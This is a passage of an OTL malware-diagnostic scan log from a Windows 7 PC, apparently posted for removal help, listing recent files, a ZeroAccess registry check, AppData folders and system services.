[2013/11/15 13:46:34 | 000,266,240 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LTDIS14nu.dll
[2013/11/15 13:46:34 | 000,217,088 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LFJ2K14nu.dll
[2013/11/15 13:46:34 | 000,180,224 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\Lfpng14nu.dll
[2013/11/15 13:46:34 | 000,125,440 | ---- | C] (Inner Media, Inc.) -- C:\Windows\SysWow64\DZIP32.DLL
[2013/11/15 13:46:34 | 000,098,304 | ---- | C] (Inner Media, Inc.) -- C:\Windows\SysWow64\DUNZIP32.DLL
[2013/11/15 13:46:34 | 000,040,960 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\lfgif14nu.dll
[2013/11/15 13:46:34 | 000,036,864 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\lfbmp14nu.dll
[2013/11/15 13:46:34 | 000,032,768 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\lfwmf14nu.dll
[2013/11/15 13:46:34 | 000,032,768 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\lfpcx14nu.dll
[2013/11/15 13:46:34 | 000,028,672 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\lftga14nu.dll
[2013/11/15 13:46:34 | 000,006,144 | ---- | C] (Erik Salaj) -- C:\Windows\SysWow64\drivers\IOPORT.SYS
[2013/11/15 13:46:29 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Sierra
[2013/11/15 13:45:53 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Sierra
[2013/11/15 13:01:28 | 000,005,632 | ---- | C] (Erik Salaj) -- C:\Windows\SysWow64\drivers\MEMPORT.SYS
[2013/11/15 13:01:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Sierra
[2012/12/22 19:20:34 | 000,082,816 | ---- | C] (VSO Software) -- C:\Users\Jon Lowry\AppData\Roaming\pcouffin.sys

========== Files - Modified Within 30 Days ==========

[2013/12/07 18:19:04 | 000,000,904 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2013/12/07 18:18:50 | 001,034,531 | ---- | M] (Thisisu) -- C:\Users\Jon Lowry\Desktop\JRT.exe
[2013/12/07 18:18:33 | 000,023,248 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2013/12/07 18:18:33 | 000,023,248 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2013/12/07 18:18:26 | 001,110,034 | ---- | M] () -- C:\Users\Jon Lowry\Desktop\AdwCleaner.exe
[2013/12/07 18:13:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2013/12/07 18:11:02 | 000,000,900 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2013/12/07 18:10:40 | 3062,255,616 | -HS- | M] () -- C:\hiberfil.sys
[2013/12/07 18:10:33 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2013/12/07 17:27:03 | 000,000,944 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000UA.job
[2013/12/07 17:13:05 | 000,000,348 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForJon Lowry.job
[2013/12/06 15:39:44 | 000,001,966 | ---- | M] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk
[2013/12/06 15:39:06 | 000,205,320 | ---- | M] () -- C:\Windows\SysNative\drivers\aswVmm.sys
[2013/12/06 15:39:06 | 000,065,264 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswTdi.sys
[2013/12/06 15:39:05 | 001,032,416 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswSnx.sys
[2013/12/06 15:39:05 | 000,409,832 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswSP.sys
[2013/12/06 15:39:05 | 000,334,648 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\aswBoot.exe
[2013/12/06 15:39:05 | 000,084,328 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswMonFlt.sys
[2013/12/06 15:39:05 | 000,065,776 | ---- | M] () -- C:\Windows\SysNative\drivers\aswRvrt.sys
[2013/12/06 15:39:05 | 000,038,984 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswFsBlk.sys
[2013/12/06 15:39:04 | 000,092,544 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswRdr2.sys
[2013/12/06 15:39:03 | 000,043,152 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr
[2013/12/06 15:14:43 | 000,000,071 | ---- | M] () -- C:\Windows\avast5.ini
[2013/12/06 15:09:59 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Jon Lowry\Desktop\OTL.exe
[2013/12/06 14:59:59 | 000,002,279 | ---- | M] () -- C:\Users\Jon Lowry\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/12/06 14:59:59 | 000,002,255 | ---- | M] () -- C:\Users\Jon Lowry\Desktop\Google Chrome.lnk
[2013/12/06 14:52:24 | 000,000,027 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\hosts
[2013/12/06 00:04:27 | 000,001,109 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2013/12/06 00:00:36 | 000,000,960 | ---- | M] () -- C:\Users\Public\Desktop\calibre - E-book management.lnk
[2013/12/05 15:46:30 | 000,181,817 | ---- | M] () -- C:\Users\Jon Lowry\Desktop\Allegiant Search _ Allegiant Air.pdf
[2013/12/05 13:21:31 | 000,002,183 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2013/12/04 14:27:01 | 000,000,922 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000Core.job
[2013/12/02 22:11:08 | 000,172,693 | ---- | M] () -- C:\Windows\hpoins46.dat.temp
[2013/12/02 22:11:08 | 000,172,693 | ---- | M] () -- C:\Windows\hpoins46.dat
[2013/12/02 14:13:16 | 003,766,994 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2013/12/02 14:13:16 | 001,207,724 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2013/12/02 14:13:16 | 000,006,710 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2013/11/26 00:25:31 | 000,001,227 | ---- | M] () -- C:\Users\Public\Desktop\WinX DVD Author.lnk
[2013/11/17 23:57:39 | 000,692,616 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2013/11/17 23:57:39 | 000,071,048 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2013/11/16 16:28:03 | 000,675,988 | ---- | M] () -- C:\Users\Jon Lowry\Desktop\Minecraft.exe
[2013/11/15 13:49:50 | 000,001,991 | ---- | M] () -- C:\Users\Public\Desktop\SEU Explorer.lnk
[2013/11/15 13:49:50 | 000,001,938 | ---- | M] () -- C:\Users\Public\Desktop\SEU Design.lnk

========== Files Created - No Company Name ==========

[2013/12/07 18:18:21 | 001,110,034 | ---- | C] () -- C:\Users\Jon Lowry\Desktop\AdwCleaner.exe
[2013/12/06 15:39:44 | 000,001,966 | ---- | C] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk
[2013/12/06 15:39:15 | 000,205,320 | ---- | C] () -- C:\Windows\SysNative\drivers\aswVmm.sys
[2013/12/06 15:39:15 | 000,065,776 | ---- | C] () -- C:\Windows\SysNative\drivers\aswRvrt.sys
[2013/12/06 14:59:59 | 000,002,255 | ---- | C] () -- C:\Users\Jon Lowry\Desktop\Google Chrome.lnk
[2013/12/06 14:53:43 | 000,000,071 | ---- | C] () -- C:\Windows\avast5.ini
[2013/12/06 00:04:27 | 000,001,109 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2013/12/05 15:46:30 | 000,181,817 | ---- | C] () -- C:\Users\Jon Lowry\Desktop\Allegiant Search _ Allegiant Air.pdf
[2013/12/02 22:10:54 | 000,172,693 | ---- | C] () -- C:\Windows\hpoins46.dat
[2013/12/02 22:10:54 | 000,000,532 | ---- | C] () -- C:\Windows\hpomdl46.dat
[2013/11/26 00:25:31 | 000,001,227 | ---- | C] () -- C:\Users\Public\Desktop\WinX DVD Author.lnk
[2013/11/16 16:28:00 | 000,675,988 | ---- | C] () -- C:\Users\Jon Lowry\Desktop\Minecraft.exe
[2013/11/15 13:49:50 | 000,001,991 | ---- | C] () -- C:\Users\Public\Desktop\SEU Explorer.lnk
[2013/11/15 13:49:50 | 000,001,938 | ---- | C] () -- C:\Users\Public\Desktop\SEU Design.lnk
[2013/11/15 13:49:23 | 000,000,042 | ---- | C] () -- C:\Windows\BDNET32.INI
[2013/04/12 10:31:30 | 000,234,280 | ---- | C] () -- C:\Windows\ngmsi.dll
[2013/04/12 10:30:42 | 000,020,776 | ---- | C] () -- C:\Windows\ngutil.exe
[2013/02/07 00:20:05 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
[2013/02/07 00:20:05 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe
[2013/02/07 00:20:05 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe
[2013/02/07 00:20:05 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe
[2013/02/07 00:20:05 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe
[2013/01/11 14:12:08 | 000,085,504 | ---- | C] () -- C:\Windows\SysWow64\ff_vfw.dll
[2013/01/04 20:12:28 | 000,006,144 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/12/28 16:23:06 | 000,000,049 | ---- | C] () -- C:\Users\Jon Lowry\jagex_cl_runescape_LIVE2.dat
[2012/12/28 16:21:45 | 000,000,050 | ---- | C] () -- C:\Users\Jon Lowry\jagex_cl_loginapplet_LIVE.dat
[2012/12/28 16:21:45 | 000,000,024 | ---- | C] () -- C:\Users\Jon Lowry\random.dat
[2012/12/28 16:20:04 | 000,000,049 | ---- | C] () -- C:\Users\Jon Lowry\jagex_cl_runescape_LIVE1.dat
[2012/12/22 19:20:34 | 000,007,859 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Roaming\pcouffin.cat
[2012/12/22 19:20:33 | 000,001,167 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Roaming\pcouffin.inf
[2012/11/20 17:36:30 | 000,000,017 | ---- | C] () -- C:\Windows\SysWow64\shortcut_ex.dat
[2012/08/25 11:42:13 | 000,000,258 | RHS- | C] () -- C:\Users\Jon Lowry\ntuser.pol
[2012/05/19 07:48:52 | 000,870,128 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Roaming\mcs.rma
[2012/03/31 02:08:06 | 000,153,600 | ---- | C] () -- C:\Windows\SysWow64\WS_ATLMovie.dll
[2012/03/31 01:32:14 | 000,000,126 | ---- | C] () -- C:\Windows\QUICKEN.INI
[2012/03/18 15:06:46 | 000,000,132 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Roaming\Adobe PNG Format CS5 Prefs
[2012/03/02 21:10:42 | 000,000,376 | ---- | C] () -- C:\Windows\ODBC.INI
[2012/02/07 00:22:56 | 000,000,032 | ---- | C] () -- C:\Users\Jon Lowry\jagex_cl_runescape_LIVE.dat
[2011/12/23 15:12:26 | 000,000,097 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Local\fusioncache.dat
[2011/06/03 14:10:04 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2011/05/16 19:50:25 | 000,001,854 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Roaming\GhostObjGAFix.xml
[2011/02/06 00:26:14 | 000,000,117 | ---- | C] () -- C:\Users\Jon Lowry\jagex_runescape_preferences2.dat
[2011/02/06 00:24:11 | 000,000,034 | ---- | C] () -- C:\Users\Jon Lowry\jagex_runescape_preferences.dat
[2011/01/29 10:50:13 | 000,000,124 | -HS- | C] () -- C:\ProgramData\.zreglib

========== ZeroAccess Check ==========

[2009/07/13 20:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2013/07/25 18:24:57 | 014,172,672 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2013/07/25 17:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 17:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 04:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 17:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

========== LOP Check ==========

[2013/03/11 13:37:55 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\.BitTornado
[2013/11/28 00:31:40 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\.minecraft
[2013/08/30 23:09:17 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\AnvSoft
[2013/12/06 15:41:09 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\AVAST Software
[2013/07/20 04:01:07 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Aventail
[2013/08/29 21:47:53 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\AVG
[2013/03/11 13:37:55 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\AVG2013
[2013/12/07 18:09:52 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Azureus
[2012/06/11 19:24:07 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Barnes & Noble
[2013/03/11 13:37:56 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Blackboard
[2013/02/10 15:39:27 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\calibre
[2012/03/18 18:48:43 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1
[2013/09/10 10:33:12 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1
[2012/02/09 12:01:59 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\com.bitcasa.Bitcasa
[2013/10/18 11:59:00 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\com.wd.WDMyCloud
[2013/02/07 00:59:14 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Curiolab
[2013/11/26 00:25:37 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Digiarty
[2013/12/07 18:11:49 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Dropbox
[2011/06/23 08:01:39 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Encryptomatic, LLC
[2013/06/15 11:53:08 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\FamilyTreeMaker
[2013/10/28 18:31:02 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\GetRightToGo
[2011/03/31 12:16:50 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\InterTrust
[2011/11/30 01:38:36 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\MusicNet
[2013/08/19 22:26:12 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Nico Mak Computing
[2013/03/11 13:37:56 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Philips
[2013/03/11 13:37:56 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Philips-Songbird
[2011/06/23 08:01:35 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\PSTViewer
[2013/11/20 21:50:07 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\SketchUp
[2013/09/24 05:00:15 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\SoftGrid Client
[2013/12/03 19:51:13 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Spotify
[2011/01/25 11:49:18 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\TP
[2012/12/08 11:14:27 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\TuneUp Software
[2011/08/18 18:38:14 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Unity
[2013/12/02 13:34:50 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\uPlayer
[2013/07/12 23:19:59 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Vso
[2012/01/05 18:25:01 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\wargaming.net
[2013/10/03 19:02:04 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\WDC
[2013/10/17 00:40:37 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Windows Live Writer
[2012/12/14 06:48:20 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Wondershare Video Converter Platinum
[2012/12/16 12:58:00 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Wondershare Video Converter Ultimate

========== Purity Check ==========



========== Custom Scans ==========

========== Base Services ==========
SRV:64bit: - [2009/07/13 17:40:01 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:64bit: - [2013/02/26 21:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:64bit: - [2009/07/13 17:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:64bit: - [2010/11/20 05:27:23 | 000,849,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:64bit: - [2010/11/20 05:25:45 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:64bit: - [2013/09/24 17:03:24 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:64bit: - [2009/07/13 17:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/13 17:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:64bit: - [2012/07/04 14:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:64bit: - [2013/07/08 21:46:20 | 000,184,320 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2013/07/08 20:46:31 | 000,140,288 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:64bit: - [2010/11/20 05:27:24 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:64bit: - [2010/11/20 05:26:04 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2010/11/20 04:18:30 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:64bit: - [2011/03/02 22:24:16 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:64bit: - [2009/07/13 17:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:64bit: - [2009/07/13 17:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/13 17:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:64bit: - [2009/07/13 17:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:64bit: - [2010/11/20 05:26:39 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:64bit: - [2009/07/13 17:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:64bit: - [2009/07/13 17:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:64bit: - [2009/07/13 17:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:64bit: - [2009/07/13 17:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/13 17:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:64bit: - [2012/10/03 09:44:21 | 000,303,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:64bit: - [2009/07/13 17:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:64bit: - [2011/05/24 03:42:55 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:64bit: - [2012/02/10 22:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:64bit: - [2013/09/24 17:03:24 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:64bit: - [2009/07/13 17:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:64bit: - [2010/11/20 05:27:24 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:64bit: - [2010/11/20 05:27:24 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:64bit: - [2010/11/20 05:27:25 | 000,030,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:64bit: - [2013/09/24 17:03:24 | 000,030,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:64bit: - [2009/07/13 17:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:64bit: - [2010/11/20 05:27:26 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:64bit: - [2010/11/20 05:27:25 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2010/11/20 04:21:19 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:64bit: - [2010/11/20 05:27:25 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:64bit: - [2010/11/20 05:27:26 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2010/11/20 04:21:28 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:64bit: - [2009/07/13 17:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:64bit: - [2012/04/30 21:40:20 | 000,209,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:64bit: - [2010/11/20 05:25:27 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:64bit: - [2010/11/20 05:25:42 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:64bit: - [2010/11/20 05:25:42 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:64bit: - [2010/11/20 05:27:25 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
SRV:64bit: - [2013/05/26 21:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2010/11/20 05:27:28 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:64bit: - [2010/11/20 05:26:59 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:64bit: - [2010/11/20 05:27:28 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:64bit: - [2010/11/20 05:24:58 | 000,128,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2010/11/20 04:17:22 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWow64\msiexec.exe -- (msiserver)
